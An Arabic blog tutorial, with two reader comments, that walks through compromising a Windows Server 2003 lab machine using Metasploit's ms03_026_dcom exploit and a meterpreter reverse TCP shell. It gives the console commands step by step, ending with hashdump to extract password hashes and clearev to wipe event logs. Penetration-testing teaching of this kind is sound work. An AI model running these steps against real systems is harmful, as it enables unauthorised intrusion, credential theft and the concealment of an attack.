شرح تطبيقي لكيفية استخدام مشروع الميتاسبلويت


نـــبدأ على بـــركة الله

.::: ســيناريو الهجــوم :::.
.::: جـــهاز الضحية :::.

نـظام الـتشغيل : Microsoft Windows Server 2003 .
إيـبـي الضحية : 192.168.42.129 .

.::: جــهاز المهاجم :::.

نـظام الـتشغيل : BackTrack 5 .
نسخة الميتاسبلويت : metasploit 3.8.0 – dev / release

إيـبـي الجهاز : 192.168.42.128 .

.::: مــاهو هـد فـنـا :::.
المعلومة الوحيدة المتوفرة لدينا عن جهاز الضحية هي أن جهازه هو Microsoft Windows Server 2003 و الهدف هو الحصول على الشيل أكسيس بتاع جهاز الضحية .

.::: تــفاصيل الهــــجوم :::.

المرحلة الأولى :
عــمل فـحص إيــبـي الضــحبة 192.168.42.129 عن طريق برنــامج Nmap.
بــعد إكتــمال الفحص تـظهر لنا المـنافذ المفتوحة في جـهاز الـضحية كما في الصورة .




كـما نلاحظ أ ن البورت 135 مــفتوح والذي يدعم خدمة RPC , إذا سوف نقوم بالبحث عن سكريبت في الميتاسبلويت من أجل إستغلال هذه الخدمة , والحصول على الشيل في حالة إذا كان جهاز الضحية مصاب بهذه الثغرة .

المرحلة الثانــية :

عن طريق BackTrack , إذهب إلى :
Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole .


أثناء تشغيل msfconsole , تحقق من أن كل شيء تمام , بعد ذالك ستظهر نافذة ال msfconsole كما في الصورة .



المرحلة الثالــثة : 
الأن نحن نعرف أن البورت 135 مفتوح , إذا سوف نقوم بالبحث عن استغلال لل RPC في الميتاسبلويت .
ملاحظة
من أجل استعراض جميع الاستغلالات في الميتاسبلويت , نقوم بتنفيد الامر « show exploits » , وكما نرى في الصورة هذه بعض الاستغلالات في الميتاسبلويت .



إذا الان في واجهة msfconsole نقوم بتنفيد الامر " search dcerpc " من أجل البحث عن جميع الاستغلالات المتعلقة ب dcerpc التي من خلالها يمكننا الحصول على الشيل أكسيس لجهاز الضحية عن طريق البورت 135 .



المرحلة الرابعـــة :

و الأن بعدما حصلنا على جميع الاستغلالات المتعلقة ب RPC , نحتاج إلى المزيد من المعلومات عن هذه الاستغلالات قبل استخدامها .

للحصول على المزيد من المعلومات التي تتعلق بالاستغلال نستخدم الأمر
" info exploit_name " والذي يعرض لنا معلومات مهمة كــ : الأهداف المتاحة , شروط الاستغلال , وتفاصيل أكثر عن الثغرة ....

و في حالتنا سنستخدم الأمر " exploit/windows/dcerpc/ms03_026_dcom info " حيثexploit/windows/dcerpc/ms03_026_dcom هو إسم الاستغلال الذي سنستخدمه .


المرحلة الخامسـة :
و الأن بعد ماعرفنا ما يلزمنا من أجل الإستغلال , سوف نقوم بتنفيذ الأمر "use exploit_name" من أجل تجهيز بيئة عمل هذا الاستغلال و الذي سنستخدمه في اختبار الإختراق J
و في حالتنا سنستخدم الأمر " exploit/windows/dcerpc/ms03_026_dcom use " من أجل تجهيز الاستغلال .


من خلال الشكل السابق , نلاحظ أنه بعد استخدامنا الإستغلال "exploit/windows/dcerpc/ms03_026_dcom " , تغير شكل ( Prompt ) من " < msf " إلى <(msf exploit (ms03_026_dcom" والذي يعني أننا دخلنا مؤقتا إلى بيئة عمل الإستغلال .

المرحلة السادسـة :

والان , سوف نقوم بالتعديل على إستغلالنا حسب ما يحتاج إليه هجومنا . إذا سوف ننفذ الأمر " show options " من أجل إستعراض مختلف البارمترات التي يتطلبها الاستغلال للعمل بشكل جيد .
في حالة هجومنا :
الخيار RPORT ( بورت الضحية ) موضوع فيه مسبقا 135 , إذا الخيار الوحيد الذي سوف نقوم بالتعديل عليه هو RHOST ( إيــبـي الضحية ) , عن طريق الأمر " set RHOST" , في حالتنا سنستخدم الأمر "set RHOST 192.168.42.129"
وكما نلاحظ في الصورة تم تهيئة المتغيرRHOST إلى 192.168.42.129


المرحلة السابعـة :
إذا المرحلة الأخيرة قبل تنفيذ الاستغلال هي تعديل البايلود الخاص بنا من أجل الاستغلال .
نستطيع مشاهدة جميع البايلود عن طريق الأمر "show payloads" .
والصورة توضح جميع البايلود المتوافقة مع الاستغلال الذي إختارناه .


في حالتنا سوف نستخدم البايلود الشهير " reverse tcp metetpreter" وذالك باستخدام الأمر
"windows/meterpreter /reverse_tcp set PAYLOAD"
من أجل الحصول على الشيل إذا تم استغلال النظام بنجاح .


المرحلة الثامنـة :
والأن لم يبقى سوى رؤية البارمترات المتاحة مجددا عن طريق الأمر " show options " للتأكد من أن كل الخيارات تم تهيئتها جيدا من أجل تنفيذ الإستغلال بشكل جيد .


نلاحظ في الشكل السابق أن الخيار LHOST ( إيــبـي جهازنا ) بتاع البايلود لم يتم تهيئته , إذا سوف نقوم بتهيئته بــ :92.168.42.128 بإستخدام الأمر "set LHOST 192.168.42.128" .


المرحلة التاسعـة :
والان كل شيء تمام والاستغلال تم تعديله بشكل جيد , الان حان وقت تنفيذ الاستغلال ( أرى أن الكل ينتظر ماذا سيقع J )
أه نسيت , قبل تنفيذ الاستغلال سوف نستخدم أحد أهم الأوامر في الميتاسبلويت وهو الأمر " check ".

------------------------------ ملاحظة ---------------------------
بالنسبة للأمر " check " فهو يستخدم للتحقق من أن جهاز الضحية قابل للاستغلال من هجومنا أو لا .
هذا الأمر أو الخيار غير موجود في جميع الاستغلالات , وفائدته كما قلت سابقا يتيح لنا فرصة التأكد من أن جهاز الضحية مرقع أو لا من الثغرة .


كما تلاحظون في الصورة فهذا الاستغلال لا يدعم الخيار " check ".
----------------------------------------------------------------------------------------
لم يبقى الآن سوى تنفيذ الاستغلال عن طريق الأمر " exploit"


من الشكل السابق نلاحظ أن الاستغلال قد تم تنفيذه بنجاح على جهاز الضحية وتم اختراقه , والدليل على ذالك هو تغير شكل ( Prompt ) إلى meterpreter >

المرحلة العاشرة و الأخيرة :
والأن بعد أن تم الاختراق وعمل اتصال بين جهاز الضحية و جهازنا عن طريق "meterpreter" , أصبح عندنا كامل التحكم في جهاز الضحية .
والان بإمكاننا استخدام الأمر "Help " لمعرفة الأوامر الممكن تنفيذها على جهاز الضحية .
والصورة تظهر بعض الأوامر التي استخدمتها لتنفذ على جهاز الضحية :


شرح الأوامر التي تظهر في الصورة :
ipconfig : هذا الأمر يظهر جميع عناوين TCP/ IP الحالية في جهاز الضحية.
getuid : هذا الأمر يظهر إسم مستخدم النظام بتاع الضحية.
Hashdump: هذا الأمر يستخرج أسماء المستخدمين و كلمات مرورهم.
Clearev: يستعمل هذا الأمر من أجل مسح كل الآثار التي تركناها على جهاز الضحية.
فعلتها أخيرا 

2 comments:

Unknown said...

على اساس انت بحثت عن
dcerpc

لو تشوف اللي مكتوب امام البورت 135
بتلقى مكتوب
msrpc
ممكن تشرح لي؟
شكرا

fares said...

'

Post a Comment